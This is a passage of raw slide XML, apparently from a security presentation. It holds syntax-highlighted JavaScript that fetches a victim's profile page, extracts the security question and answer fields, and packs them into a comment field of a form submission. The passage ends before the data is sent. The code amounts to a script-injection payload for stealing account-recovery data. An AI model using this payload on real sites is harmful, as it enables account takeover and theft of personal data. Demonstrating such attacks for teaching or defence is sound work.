                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6918D698-94D2-EAB4-7FF3-FE722BC23A3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043082" y="2716306"/>
            <a:ext cx="5091953" cy="3675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FA89B1B3-C6D6-45AA-3C25-FB12CB860CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782222" y="835278"/>
            <a:ext cx="2186464" cy="3675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024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812F08-718D-903E-4721-9FC7989FEB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="85777"/>
            <a:ext cx="10972800" cy="6686446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>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response</a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>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html</a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// This is the HTML from our response as a text string</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOMParser</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r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parseFromString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"text/html"</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r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>security_question</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</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r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>security_answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</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r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>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data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>utk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response_content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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version</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F44747"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ,\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"answers</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D7BA7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>questionUuid</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78942292</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                ,</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answer</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Something else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"comment</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9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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D7BA7D"/>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CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" dirty="0">
                <a:solidFill>
